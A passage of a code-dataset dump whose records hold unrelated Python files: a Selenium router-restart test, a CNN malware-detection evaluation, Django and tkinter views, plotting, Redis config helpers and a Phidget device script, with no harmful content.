)\n","sub_path":"contractor/Foreman/runner_plugins/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600060242","text":"#coding:utf-8\nfrom selenium import webdriver\nimport unittest\nfrom Page import lecooRestart,lecooLogin\nimport time\n\nclass lecooRestartPage(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.get('http://192.168.99.1')\n self.driver.implicitly_wait(30)\n\n\n def test_restart(self):\n lecooLogin.login(self.driver,pwd='12345678')\n lecooLogin.wait()\n lecooRestart.restart(self.driver)\n time.sleep(100)\n self.assertEqual('欢迎使用Lecoo路由',lecooRestart.restartSuccess(self.driver))\n\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__=='__main__':\n unittest.main()\n\n\n","sub_path":"TestCase/test_lecooRestart.py","file_name":"test_lecooRestart.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"545131517","text":"import torch \nimport torch.nn as nn\n#import torchvision.transforms as transforms\nimport torch.utils.data as utils\nfrom torch.autograd import Variable\nimport numpy as np\nfrom utils import compute_nystrom,create_train_test_loaders,imbalance\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold\nfrom model import CNN\nfrom graph_kernels import sp_kernel, wl_kernel\nimport xlwt\nimport xlrd \nfrom xlutils.copy import copy \nfrom xlwt import Style \ndef writeExcel(row, col, value, file_name,styl=Style.default_style): \n rb = xlrd.open_workbook(file_name) \n wb = copy(rb) \n ws = wb.get_sheet(0) \n ws.write(row, col, value, styl) \n wb.save(file_name) \n\ncommunity_detection = \"louvain\"\n\n# Hyper Parameters\ndim = 100\nbatch_size = 10\nnum_epochs = 150\nnum_filters = 20\nhidden_size = 20\nlearning_rate = 0.005\nuse_node_labels = False\nkernels=[wl_kernel]\nnum_kernels = len(kernels)\n\ndef test_():\n print(\"Computing feature maps...\")\n Q, subgraphs, labels,shapes = compute_nystrom(use_node_labels, dim, community_detection, kernels)\n M=np.zeros((shapes[0],shapes[1],len(kernels)))\n for idx,k in enumerate(kernels):\n M[:,:,idx]=Q[idx]\n Q=M\n # Binarize labels\n le = LabelEncoder()\n y = le.fit_transform(labels)\n # Build vocabulary\n max_document_length = max([len(x.split(\" \")) for x in subgraphs])\n x = np.zeros((len(subgraphs), max_document_length), dtype=np.int32)\n for i in range(len(subgraphs)):\n\t communities = subgraphs[i].split()\n\t for j in range(len(communities)):\n\t\t x[i,j] = int(communities[j])\n reg=x[0:2500]\n gen=x[2500:5000]\n mal=x[5000:] \n reg_label=y[:2500]\n gen_label=y[2500:5000]\n mal_label=y[5000:]\n \n train_reg=reg[0:1500]\n test_reg=reg[1500:]\n train_reg_y=reg_label[0:1500]\n test_reg_y=reg_label[1500:]\n \n train_mal=mal[0:1500]\n test_mal=mal[1500:]\n train_mal_y=mal_label[0:1500]\n test_mal_y=mal_label[1500:]\n \n train_gen=gen[0:1500]\n train_gen_y=gen_label[0:1500]\n \n train_fake=np.concatenate((train_reg,train_gen),axis=0)\n y_train_fake=np.concatenate((train_reg_y,train_gen_y),axis=0)\n train_real=np.concatenate((train_reg,train_mal),axis=0)\n y_train_real=np.concatenate((train_reg_y,train_mal_y),axis=0)\n test=np.concatenate((test_reg,test_mal),axis=0)\n y_test=np.concatenate((test_reg_y,test_mal_y),axis=0)\n\n \n def train_test(Q, x_train, x_test, y_train, y_test, batch_size): \n train_loader, test_loader = create_train_test_loaders(Q, x_train, x_test, y_train, y_test, batch_size)\t\t \n cnn = CNN(input_size=num_filters, hidden_size=hidden_size, num_classes=np.unique(y).size, dim=dim, num_kernels=num_kernels, max_document_length=max_document_length)\n if torch.cuda.is_available():\n cnn.cuda()\n if torch.cuda.is_available():\n criterion = nn.CrossEntropyLoss().cuda()\n else:\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(cnn.parameters(), lr=learning_rate)\n for epoch in range(num_epochs):\n for i, (graphs, labels) in enumerate(train_loader):\n graphs = Variable(graphs)\n labels = Variable(labels)\n optimizer.zero_grad()\n outputs = cnn(graphs)\n if torch.cuda.is_available():\n loss = criterion(outputs, labels.cuda())\n else:\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\t\t \t# Test the Model\n \n cnn.eval() \n correct = 0\n total = 0\n TP=0\n TN=0\n FP=0\n FN=0\n predict=[]\n label=[]\n output=[]\n for graphs, labels in test_loader:\n graphs = Variable(graphs)\n outputs = cnn(graphs)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels.cuda()).sum()\n TP += (predicted+labels.cuda()==2).sum()\n FP+=(predicted*5+labels.cuda()*1==5).sum()\n FN+=(predicted*1+labels.cuda()*5==5).sum()\n TN+=(predicted+labels.cuda()==0).sum()\n predict.append(predicted)\n label.append(labels)\n output.append(outputs.data)\n if TP+FP==0: precision=0\n else: precision=TP/(TP+FP)\n if TP+FN==0: recall=0\n else: recall=TP/(TP+FN)\n l=np.zeros((len(label)))\n for i in range(len(label)):\n l[i]=int(label[i])\n s=np.zeros((len(output)))\n for i in range(len(output)):\n s[i]=output[i][0][1]\n return TP,TN,FP,FN,precision,recall,l,s\n TP_fake,TN_fake,FP_fake,FN_fake,precision_fake,recall_fake,l_fake,s_fake=train_test(Q, train_fake, test, y_train_fake, y_test, batch_size)\n TP_real,TN_real,FP_real,FN_real,precision_real,recall_real,l_real,s_real=train_test(Q, train_real, test, y_train_real, y_test, batch_size)\n return TP_fake,TN_fake,FP_fake,FN_fake,precision_fake,recall_fake,l_fake,s_fake,TP_real,TN_real,FP_real,FN_real,precision_real,recall_real,l_real,s_real\n'''\nnum=0\nlab=[]\nsc=[]\nskip=[]\nfor user in red_user: \n try:\n TP,TN,FP,FN,precision,recall,l,s=test_(user,red_user)\n writeExcel(int(num)+1,0, user, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,1, TN, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,2, TP, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,3, FN, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,4, FP, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,5, precision, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n writeExcel(int(num)+1,6, recall, 'C:/Users/gxjco/Desktop/New folder (2)/result_CGN.xls')\n print(num)\n num+=1\n lab.append(l)\n sc.append(s)\n except: skip.append(user)\n \nlabel_total=lab[0]\nscore_total=sc[0]\nfor i in range(97):\n label_total=np.concatenate((label_total,lab[i+1]),axis=0)\n score_total=np.concatenate((score_total,sc[i+1]),axis=0)\n#draw ROC tota\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfpr,tpr,threshold = roc_curve(label_total, score_total) \nroc_auc = auc(fpr,tpr)\nplt.figure() \nlw = 2 \nplt.figure(figsize=(10,10)) \nplt.plot(fpr, tpr, color='darkorange', \n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) \nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') \nplt.xlim([0.0, 1.0]) \nplt.ylim([0.0, 1.05]) \nplt.xlabel('False Positive Rate') \nplt.ylabel('True Positive Rate') \nplt.title('ROC curve on KCNN model') \nplt.legend(loc=\"lower right\") \nplt.show() '''","sub_path":"evaluation_poisson/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"599628251","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom .forms import contactForm\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n#------- 함수로 구현한 contactForm 뷰\n# def contact(request):\n# form = contactForm(request.POST or None)\n#\n# if form.is_valid():\n# #print request.POST\n# #print form.cleaned_data['email']\n# name = form.cleaned_data['name']\n# comment = form.cleaned_data['comment']\n# subject = 'Message from MYSITE.com'\n# message = '%s\\n\\n from %s' %(comment, name)\n# emailFrom = form.cleaned_data['email']\n# emailTo = [settings.EMAIL_HOST_USER]\n# send_mail(subject, message, emailFrom, emailTo, fail_silently=True)\n#\n# context = locals()\n# template = 'contact/contact.html'\n# return render(request, template, context)\nfrom django.views.generic.edit import FormView\nfrom .forms import contactForm\n#------- 클래스로 구현한 contactForm 뷰\nclass ContactFormView(FormView):\n form_class = contactForm\n template_name = 'contact/contact.html'\n\n def form_valid(self,form):\n name = self.request.POST['name']\n comment = self.request.POST['comment']\n subject = 'Message from MYSITE.com'\n message = '%s\\n\\n from %s' % (comment, name)\n emailFrom = self.request.POST['email']\n emailTo = [settings.EMAIL_HOST_USER]\n\n send_mail(subject, message, emailFrom, emailTo, fail_silently=True)\n\n confirm_message = \"Thanks for the message. We will get right back to you.\"\n\n context = {}\n #context['form'] = form\n context['sender'] = name\n context['email'] = emailFrom\n context['confirm_message'] = confirm_message\n return render(self.request, self.template_name, context)","sub_path":"mysite/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"281923291","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.urls.base import reverse\nfrom 錄音.models import TsokPhin\nfrom 錄音.tasks import decoding\n\n\n@login_required(login_url='/admin/login/')\ndef lokim(request, tsokphin_id):\n tsokphin = TsokPhin.objects.get(id=tsokphin_id)\n if request.method == 'POST':\n _thuan(request.FILES['imtong'], tsokphin_id)\n return render(\n request, 'liokim/index.html',\n {\n 'tsokphin': tsokphin.作品名,\n 'kautui': '{}?作品__id__exact={}'.format(\n reverse('admin:錄音_句表_changelist'), tsokphin_id\n )\n }\n )\n\n\ndef _thuan(imtong, tsokphin_id):\n ku = TsokPhin.objects.get(id=tsokphin_id).Ku.create()\n ku.音檔.save('{}.wav'.format(ku.id), imtong)\n decoding.delay(ku.id, ku.音檔.name)\n","sub_path":"錄音/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"482357301","text":"# Lisa Westover\n# CS1400 7 week\n# Unit4/Task2- chessboard.py\n\nimport turtle\n\n# draw the main outline of the board and call drawAllRectangles to do the inside squares\ndef drawChessboard(startX, startY, width=250, height=250):\n turtle.getturtle()\n turtle.showturtle()\n turtle.penup()\n turtle.goto(startX, startY)\n turtle.pendown()\n turtle.forward(width)\n turtle.left(90)\n turtle.forward(height)\n turtle.left(90)\n turtle.forward(width)\n turtle.left(90)\n turtle.forward(height)\n\n\n\n #call drawAllRectangles to loop to the squares\n drawAllRectangles(startX, startY, width, height)\n\n# calculate and loop the location for each rectangle then shift and loop again\ndef drawAllRectangles(startX, startY, width, height):\n squareHeight = float(height / 8)\n squareWidth = float(width / 8)\n newStartX = float(startX)\n newStartY = float(startY)\n turtle.goto(startX, startY + squareHeight)\n for j in range(4):\n\n for i in range(4):\n # begin drawing squares\n\n drawRectangle(newStartX, newStartY, squareWidth, squareHeight)\n\n newStartX = newStartX + squareWidth + squareWidth\n newStartY = newStartY + squareHeight * 2\n newStartX = startX\n\n newStartX = startX + squareWidth\n newStartY = startY + squareHeight\n\n for j in range(4):\n for i in range(4):\n drawRectangle(newStartX, newStartY, squareWidth, squareHeight)\n newStartX = newStartX + squareWidth + squareWidth\n newStartY = newStartY + squareHeight * 2\n newStartX = startX + squareWidth\n\n #turtle.forward(squareWidth * 2)\n\n print(\"should be done drawing squares\")\n turtle.done\n\n# pass coordinates to create individual rectangle\ndef drawRectangle(newStartX, newStartY, squareWidth, squareHeight):\n turtle.penup()\n turtle.goto(newStartX, newStartY)\n turtle.pendown()\n turtle.begin_fill()\n turtle.color(\"black\")\n turtle.setheading(0)\n turtle.forward(squareWidth)\n turtle.setheading(90)\n turtle.forward(squareHeight)\n turtle.setheading(180)\n turtle.forward(squareWidth)\n turtle.setheading(270)\n turtle.forward(squareHeight)\n turtle.end_fill()\n turtle.left(90)\n\n\n # tell turtle to draw a square starting from new xy and square height and width","sub_path":"Assignments/Westover-Lisa-Unit4/chessboard.py","file_name":"chessboard.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"331289705","text":"import numpy as np\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport statsmodels.api as sm\nimport tqdm\n\n\ndf = pd.read_csv('total_not_market.csv',encoding = 'utf-8-sig')\n\n\nl=[]\nfor i in df.values:\n l.append([i[3],i[5]])\n\n\ndf_l_1 = pd.DataFrame(l,columns=['品名','地區'])\ndf_l = df_l_1.drop_duplicates(['品名','地區'])\n\n\ntrain_test_regrassion = []\nfor name in tqdm.tqdm(df_l.values):\n try:\n coco = []\n for i in df.values:\n if i[3] == name[0] and i[5] == name[1] :\n coco.append([i[6],i[7]])\n coco_df = pd.DataFrame(coco,columns=['價格','交易量'])\n #iris_three = iris.drop('品名',axis = 1).drop('日期',axis = 1)\n price = coco_df['價格'].tolist()\n del price[0]\n price.append(14.82)\n coco_df['過去價格'] = price\n #climate = pd.read_excel('final.xlsx',encoding = 'utf-8-sig')\n #climate_four = climate.drop(\"時間\", axis = 1).drop('價格',axis = 1).drop('時間.1',axis = 1).drop('相對溼度(%)',axis = 1)\n #\n #combin = pd.concat([iris_three,climate_four],axis=1)\n coco_X =coco_df.iloc[:,1:].values\n coco_y = coco_df.iloc[:,0]\n #iris_y_pro =iris_three.iloc[:,:1].values\n #iris_y_list=[]\n #for i in iris_y_pro:\n # iris_y_list.append(i[0])\n coco_y = np.array(coco_y,dtype=int)\n #print(coco_X)\n #print(coco_y)\n X_train, X_test, y_train, y_test = train_test_split(coco_X, coco_y, test_size=0.3)\n # fit model no training data\n model = XGBClassifier()\n model.fit(X_train, y_train)\n y_result = model.predict(X_test)\n #predictions = [round(value) for value in y_result]\n #accuracy = accuracy_score(y_test, predictions)\n #print(accuracy)\n #print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n est = sm.OLS(y_test,y_result)\n est1 = est.fit() \n print(est1.rsquared)\n except:\n print('資料量過少')\n continue\n\ntrain_test_df = pd.DataFrame(train_test_regrassion,columns=['品名','地區','判定係數'])\n\ntrain_test_df.to_csv('price_volumn_regrassion.csv',encoding = 'utf-8-sig',index = False)\n\n","sub_path":"price_predict/ML/XGB_day.py","file_name":"XGB_day.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"303156323","text":"from random import randint\n\nRAND_RANGE = (-100, 300)\nCORRECT_RANGE = (0, 256)\n\n####################################\n\nNUM_CASES = 20\n\nTEST_CASE_FORMAT = \"\"\"\ncase = Test %d\ninput = %d\noutput = \"%s\"\n\"\"\"\n\n####################################\n\n\nfor i in range(1, 1+NUM_CASES):\n\n inp = randint(*RAND_RANGE)\n\n if inp not in range(*CORRECT_RANGE):\n out = \"It is not in range\"\n else:\n binary = \"{0:08b}\".format(inp)\n out = \" \".join(binary)\n\n print(TEST_CASE_FORMAT % (i, inp, out))\n","sub_path":"fall-2017/gen-test-dec-to-bin.py","file_name":"gen-test-dec-to-bin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199511005","text":"import tkinter as tk\n\n\nclass AddTaskWindow(tk.Frame):\n def __init__(self, master, service, boss):\n super().__init__(master)\n self.master = master\n self.masterService = service\n self.boss = boss\n self.addButtons()\n self.addTextboxes()\n self.addLabels()\n self.grid(sticky='nswe')\n\n def addTextboxes(self):\n self.nameBox = tk.Entry(self.master, width=32)\n self.nameBox.grid(column=1, row=0, columnspan=4)\n\n self.dateBox = tk.Entry(self.master, width=10)\n self.dateBox.grid(column=1, row=1)\n\n self.dueBox = tk.Entry(self.master, width=10)\n self.dueBox.grid(column=3, row=1)\n\n def addLabels(self):\n self.nameLabel = tk.Label(self.master, width=10, height=1,\n text='Nombre:')\n self.nameLabel.grid(column=0, row=0)\n\n self.dateLabel = tk.Label(self.master, width=10, height=1,\n text='Inicio:')\n self.dateLabel.grid(column=0, row=1)\n\n self.dueLabel = tk.Label(self.master, width=10, height=1,\n text='Hasta:')\n self.dueLabel.grid(column=2, row=1)\n\n def addButtons(self):\n self.saveButton = tk.Button(self.master, text=\"Guardar\",\n width=18, command=self.addTask)\n self.saveButton.grid(column=0, columnspan=2, row=2)\n\n self.cancelButton = tk.Button(self.master, text=\"Cancelar\",\n command=self.master.destroy,\n width=18)\n self.cancelButton.grid(column=2, columnspan=2, row=2)\n\n def addTask(self, id=None):\n nombre = self.nameBox.get()\n date = self.dateBox.get()\n due = self.dueBox.get()\n self.data = [nombre, date, due]\n task = self.masterService.addTask(data=self.data)\n self.boss.displayTask(task.__dict__)\n self.master.destroy()\n del self\n\n\nif __name__ == \"__main__\":\n branch = tk.Tk()\n addTaskWindow = AddTaskWindow(branch)\n branch.mainloop()\n","sub_path":"addTaskWindow.py","file_name":"addTaskWindow.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380942483","text":"# def sum(a=5, b=10):\r\n# \"\"\"\r\n# doc string\r\n# \"\"\"\r\n# return a + b, a - b, a * b\r\n\r\n# a = int(input())\r\n# b = int(input())\r\n# c, _, _ = sum(a, b)\r\n# print(c)\r\n\r\npow2 = []\r\nfor i in range(10):\r\n pow2.append(2 ** i)\r\n\r\npow2 = [2 ** x for x in range(10)]\r\n\r\nn = int(input())\r\nall_even = [x for x in range(n) if x % 2 == 0]\r\nprint(all_even)","sub_path":"!Less/!LES1.0/1.6les.py","file_name":"1.6les.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"588000164","text":"import itertools\nfrom typing import List\nfrom typing import Sequence\nfrom typing import Union\n\nimport numpy as np\n\nfrom optuna._experimental import experimental\nfrom optuna.logging import get_logger\nfrom optuna.study import Study\nfrom optuna.trial import TrialState\nfrom optuna.visualization.matplotlib._matplotlib_imports import _imports\n\n\nif _imports.is_successful():\n from optuna.visualization.matplotlib._matplotlib_imports import Axes\n from optuna.visualization.matplotlib._matplotlib_imports import plt\n\n_logger = get_logger(__name__)\n\n\n@experimental(\"2.2.0\")\ndef plot_edf(study: Union[Study, Sequence[Study]]) -> \"Axes\":\n \"\"\"Plot the objective value EDF (empirical distribution function) of a study with Matplotlib.\n\n .. seealso:: optuna.visualization.plot_edf\n\n Args:\n study:\n A target :class:`~optuna.study.Study` object.\n You can pass multiple studies if you want to compare those EDFs.\n\n Returns:\n A :class:`matplotlib.axes.Axes` object.\n \"\"\"\n\n _imports.check()\n\n if isinstance(study, Study):\n studies = [study]\n else:\n studies = list(study)\n\n return _get_edf_plot(studies)\n\n\ndef _get_edf_plot(studies: List[Study]) -> \"Axes\":\n\n # Set up the graph style.\n plt.style.use(\"ggplot\") # Use ggplot style sheet for similar outputs to plotly.\n _, ax = plt.subplots()\n ax.set_title(\"Empirical Distribution Function Plot\")\n ax.set_xlabel(\"Objective Value\")\n ax.set_ylabel(\"Cumulative Probability\")\n ax.set_ylim(0, 1)\n cmap = plt.get_cmap(\"tab20\") # Use tab20 colormap for multiple line plots.\n\n # Prepare data for plotting.\n if len(studies) == 0:\n _logger.warning(\"There are no studies.\")\n return ax\n\n all_trials = list(\n itertools.chain.from_iterable(\n (\n trial\n for trial in study.get_trials(deepcopy=False)\n if trial.state == TrialState.COMPLETE\n )\n for study in studies\n )\n )\n\n if len(all_trials) == 0:\n _logger.warning(\"There are no complete trials.\")\n return ax\n\n min_x_value = min(trial.value for trial in all_trials)\n max_x_value = max(trial.value for trial in all_trials)\n x_values = np.linspace(min_x_value, max_x_value, 100)\n\n # Draw multiple line plots.\n for i, study in enumerate(studies):\n values = np.asarray(\n [\n trial.value\n for trial in study.get_trials(deepcopy=False)\n if trial.state == TrialState.COMPLETE\n ]\n )\n\n y_values = np.sum(values[:, np.newaxis] <= x_values, axis=0) / values.size\n\n ax.plot(x_values, y_values, color=cmap(i), alpha=0.7, label=study.study_name)\n\n return ax\n","sub_path":"optuna/visualization/matplotlib/_edf.py","file_name":"_edf.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546397074","text":"import os\nimport md5\nimport copy\nimport time\nimport fnmatch\nfrom yy.utils import convert_list_to_dict\nfrom yy.db.redisscripts import load_redis_script\nfrom yy.config.cache import load\nfrom proxy_objects import AbstractWrapper\nfrom functools import reduce\nfrom common.redishelpers import RHash\n\n\ndef get_session_pool():\n import settings\n return settings.REDISES[\"session\"]\n\n\ndef get_index_pool():\n import settings\n return settings.REDISES[\"index\"]\n\n\ndef get_settings_pool():\n import settings\n return settings.REDISES['settings']\n\n\ndef make_settings_key(regionID, worldID):\n return 'REGION{%s}_WORLD{%s}' % (str(regionID), str(worldID))\n\n\ndef make_region_settings_key(regionID):\n return \"REGION{%s}\" % str(regionID)\n\n\ndef parse_world(world):\n if world:\n world['ID'] = int(world['ID'])\n world['port'] = int(world['port'])\n world['online'] = int(world.get('online', 0))\n return world\n\n\ndef make_hash(o):\n if isinstance(o, (set, tuple, list)):\n return tuple([make_hash(e) for e in o])\n elif not isinstance(o, dict):\n return hash(o)\n new_o = copy.deepcopy(o)\n for k, v in new_o.items():\n new_o[k] = make_hash(v)\n return hash(tuple(frozenset(sorted(new_o.items()))))\n\n\nclass Singleton(object):\n objs = {}\n\n def __new__(cls, *args, **kwargs):\n if args or kwargs:\n hashed = make_hash((cls, args, kwargs))\n else:\n hashed = cls\n if hashed in cls.objs:\n return cls.objs[hashed]['obj']\n obj = object.__new__(cls, *args, **kwargs)\n cls.objs[hashed] = {'obj': obj, 'init': False}\n setattr(cls, '__init__', cls.decorate_init(cls.__init__))\n return obj\n\n @classmethod\n def decorate_init(cls, fn):\n def init_wrap(*args, **kwargs):\n if args[1:] or kwargs:\n hashed = make_hash((cls, args[1:], kwargs))\n else:\n hashed = cls\n if not cls.objs[hashed]['init']:\n fn(*args, **kwargs)\n cls.objs[hashed]['init'] = True\n return\n return init_wrap\n\n\nclass Fetcher(AbstractWrapper):\n extra = None\n\n def __init__(self, *arg_for_handle, **kwargs):\n super(Fetcher, self).__init__()\n self.extra = kwargs\n self.extra.setdefault('args_for_handle', arg_for_handle)\n\n def __getattr__(self, attr):\n if attr == '__subject__':\n try:\n super(Fetcher, self).__getattr__(attr)\n except AttributeError:\n self.fetch()\n return self.__subject__\n return super(Fetcher, self).__getattr__(attr)\n\n def fetch(self):\n r = self.handle(*self.extra['args_for_handle'], **self.extra)\n f = self.extra.get('formatter')\n if f:\n self.__subject__ = f(r)\n else:\n self.__subject__ = r\n return self.__subject__\n\n def clear(self):\n if hasattr(self, '__subject__'):\n del self.__subject__\n\n def handle(self, *args):\n raise NotImplementedError\n\n\nclass RedisFetcher(Fetcher):\n\n def handle(self, *args, **kwargs):\n pool = kwargs.get(\"pool\", None)\n if not pool:\n pool = get_settings_pool()\n with pool.ctx() as conn:\n return conn.execute(*args)\n\n\nclass ClientConfig(Singleton):\n\n def __init__(self):\n self.key = 'client_config'\n self.pool = get_index_pool()\n\n def set(self, version, data):\n with self.pool.ctx() as conn:\n return conn.execute(\"HSET\", self.key, version, data)\n\n def get(self, version):\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, version)\n\n\nclass ConfigFiles(Singleton):\n\n def __init__(self, id):\n self.id = id\n self.key = \"config_files.{}\".format(id)\n self.pool = get_index_pool()\n self.md5_prefix = '_md5'\n self.files = RedisFetcher(\n \"HGETALL\",\n self.key,\n formatter=lambda s: {\n k: v for k,\n v in convert_list_to_dict(s).items() if not k.endswith(\"_md5\")\n }, pool=self.pool)\n\n def get_file(self, name):\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, name)\n\n def get_file_md5(self, name):\n name_md5 = name + self.md5_prefix\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, name_md5)\n\n def set_file(self, name, source):\n m = md5.new(source)\n name_md5 = name + self.md5_prefix\n hexdigest = m.hexdigest()\n with self.pool.ctx() as conn:\n check_sum = self.get_file_md5(name)\n if check_sum == hexdigest:\n return\n conn.execute(\n \"HMSET\", self.key,\n name, source,\n name_md5, hexdigest)\n # FIXME\n path = \"data/region{}\".format(self.id)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(\"data/region{}/{}.csv\".format(self.id, name), \"w\") as f:\n f.write(source)\n\n def del_file(self, name):\n name_md5 = name + self.md5_prefix\n with self.pool.ctx() as conn:\n conn.execute(\"HDEL\", self.key, name, name_md5)\n\n def get_names(self):\n with self.pool.ctx() as conn:\n return [e for e in conn.execute(\n \"HKEYS\", self.key\n ) if not e.endswith(self.md5_prefix)]\n\n def check_files(self, path):\n files = set()\n for filename in os.listdir(path):\n if not fnmatch.fnmatch(filename, \"*.csv\"):\n continue\n fullname = os.path.join(path, filename)\n name, _ = os.path.splitext(filename)\n with open(fullname) as f:\n self.set_file(name, f.read())\n files.add(name)\n for filename in self.get_names():\n name, _ = os.path.splitext(filename)\n if name not in files:\n self.del_file(name)\n\n def load_configs(self, configs, path, **sources):\n if not sources:\n sources = self.files.fetch()\n load(configs, path, **sources)\n","sub_path":"server/pokemon_server/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"278880376","text":"#!/usr/bin/env python\r\n\r\n\"\"\"\r\nPhidget Interface Kit module\r\n\r\n\"\"\"\r\n\r\n# Basic imports\r\nimport sys\r\nfrom Phidgets.PhidgetException import PhidgetException\r\nfrom Phidgets.Devices.InterfaceKit import InterfaceKit\r\n\r\n# Create an interface kit object\r\ntry:\r\n interfaceKit = InterfaceKit()\r\nexcept RuntimeError as e:\r\n print(\"Runtime Exception: %s\" % e.details)\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\n# Information Display Function\r\n\r\n\r\ndef display_device_info():\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"|- Attached -|- Type -|- Serial No. -|- Version -|\")\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"|- %5s -|- %30s -|- %10d -|- %8d -|\" % (interfaceKit.isAttached(), interfaceKit.getDeviceName(), interfaceKit.getSerialNum(), interfaceKit.getDeviceVersion()))\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"Number of Digital Inputs: %i\" % (interfaceKit.getInputCount()))\r\n print(\"Number of Digital Outputs: %i\" % (interfaceKit.getOutputCount()))\r\n print(\"Number of Sensor Inputs: %i\" % (interfaceKit.getSensorCount()))\r\n\r\n# Event Handler Callback Functions\r\n\r\n\r\ndef interface_kit_attached(e):\r\n attached = e.device\r\n print(\"InterfaceKit %i Attached!\" % (attached.getSerialNum()))\r\n\r\n\r\ndef interface_kit_detached(e):\r\n detached = e.device\r\n print(\"InterfaceKit %i Detached!\" % (detached.getSerialNum()))\r\n\r\n\r\ndef interface_kit_error(e):\r\n try:\r\n source = e.device\r\n print(\"InterfaceKit %i: Phidget Error %i: %s\" % (source.getSerialNum(), e.eCode, e.description))\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n\r\n\r\ndef interface_kit_input_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Input %i: %s\" % (source.getSerialNum(), e.index, e.state))\r\n\r\n\r\ndef interface_kit_sensor_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Sensor %i: %i\" % (source.getSerialNum(), e.index, e.value))\r\n\r\n\r\ndef interface_kit_output_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Output %i: %s\" % (source.getSerialNum(), e.index, e.state))\r\n\r\n# Main Program Code\r\ntry:\r\n # logging example, uncomment to generate a log file\r\n # interfaceKit.enableLogging(PhidgetLogLevel.PHIDGET_LOG_VERBOSE, \"phidgetlog.log\")\r\n\r\n interfaceKit.setOnAttachHandler(interface_kit_attached)\r\n interfaceKit.setOnDetachHandler(interface_kit_detached)\r\n interfaceKit.setOnErrorhandler(interface_kit_error)\r\n interfaceKit.setOnInputChangeHandler(interface_kit_input_changed)\r\n interfaceKit.setOnOutputChangeHandler(interface_kit_sensor_changed)\r\n interfaceKit.setOnSensorChangeHandler(interface_kit_output_changed)\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Opening phidget object....\")\r\n\r\ntry:\r\n interfaceKit.openRemoteIP('169.254.4.87', 5001, -1, \"greenspy\")\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Waiting for attach....\")\r\n\r\ntry:\r\n interfaceKit.waitForAttach(10000)\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n try:\r\n 